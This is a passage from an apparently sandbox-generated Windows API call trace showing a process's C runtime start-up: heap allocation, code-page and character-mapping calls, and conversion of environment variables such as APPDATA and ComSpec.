0x6b2588 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x24) returned 0x6bb020 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x30) returned 0x6bb6b8 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x8c) returned 0x6c0078 [0167.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c0bc8 | out: hHeap=0x6a0000) returned 1 [0167.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x800) returned 0x6c0110 [0167.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x80) returned 0x6c0918 [0167.617] GetLastError () returned 0x0 [0167.617] SetLastError (dwErrCode=0x0) [0167.617] GetLastError () returned 0x0 [0167.617] SetLastError (dwErrCode=0x0) [0167.617] GetLastError () returned 0x0 [0167.617] SetLastError (dwErrCode=0x0) [0167.617] GetACP () returned 0x4e4 [0167.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x220) returned 0x6c09a0 [0167.617] GetLastError () returned 0x0 [0167.617] SetLastError (dwErrCode=0x0) [0167.617] IsValidCodePage (CodePage=0x4e4) returned 1 [0167.617] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0167.630] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0167.643] GetLastError () returned 0x0 [0167.643] SetLastError (dwErrCode=0x0) [0167.643] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0167.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0167.655] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0167.655] GetLastError () returned 0x0 [0167.655] SetLastError (dwErrCode=0x0) [0167.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0167.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0167.667] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0167.667] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0167.667] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0e\x90\x1f5äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0167.667] GetLastError () returned 0x0 [0167.667] SetLastError (dwErrCode=0x0) [0167.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0167.667] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0167.667] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0167.667] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0167.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0e\x90\x1f5äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0167.680] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0167.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0167.680] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c0918) returned 0x80 [0167.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0167.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1f) returned 0x6bedd8 [0167.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x6bedd8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0167.727] GetLastError () returned 0x0 [0167.727] SetLastError (dwErrCode=0x0) [0167.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6b1ef0 [0167.727] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6b1ef0) returned 0x4 [0167.727] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b1ef0, Size=0x8) returned 0x6b1ef0 [0167.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0167.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x2b) returned 0x6bb6f0 [0167.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x6bb6f0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0167.727] GetLastError () returned 0x0 [0167.727] SetLastError (dwErrCode=0x0) [0167.727] GetLastError () returned 0x0 [0167.727] SetLastError (dwErrCode=0x0) [0167.727] GetLastError () returned 0x0 [0167.727] SetLastError (dwErrCode=0x0) [0167.738] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6b1ef0) returned 0x8 [0167.738] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b1ef0, Size=0xc) returned 0x6c1fd0 [0167.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0167.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x37) returned 0x6c1010 [0167.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6c1010, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0167.739] GetLastError () returned 0x0 [0167.739] SetLastError (dwErrCode=0x0) [0167.739] GetLastError () returned 0x0 [0167.739] SetLastError (dwErrCode=0x0) [0167.739] GetLastError () returned 0x0 [0167.739] SetLastError (dwErrCode=0x0) [0167.739] GetLastError () returned 0x0 [0167.739] SetLastError (dwErrCode=0x0) [0167.739] GetLastError () returned 0x0 [0167.739] SetLastError (dwErrCode=0x0) [0167.739] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1fd0) returned 0xc [0167.739] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1fd0, Size=0x10) returned 0x6c1fd0 [0167.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0167.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3c) returned 0x6b25d0 [0167.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6b25d0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0167.739] GetLastError () returned 0x0 [0167.739] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1fd0) returned 0x10 [0167.740] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1fd0, Size=0x14) returned 0x6c1050 [0167.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0167.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x31) returned 0x6c1070 [0167.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6c1070, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.740] SetLastError (dwErrCode=0x0) [0167.740] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1050) returned 0x14 [0167.741] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1050, Size=0x18) returned 0x6c1050 [0167.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0167.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x18) returned 0x6c10b0 [0167.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x6c10b0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.741] SetLastError (dwErrCode=0x0) [0167.741] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] GetLastError () returned 0x0 [0167.742] SetLastError (dwErrCode=0x0) [0167.742] RtlSizeHeap (HeapHandle=0x6a0000, Flags=0x0, MemoryPointer=0x6c1050) returned 0x18 [0167.742] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6c1050, Size=0x1c) returned 0x6c10d0 [0167.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0167.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x24) returned 0x6bb050 [0167.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x6bb050, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0167.742] GetLastError () returned 0x0 [0167.742] 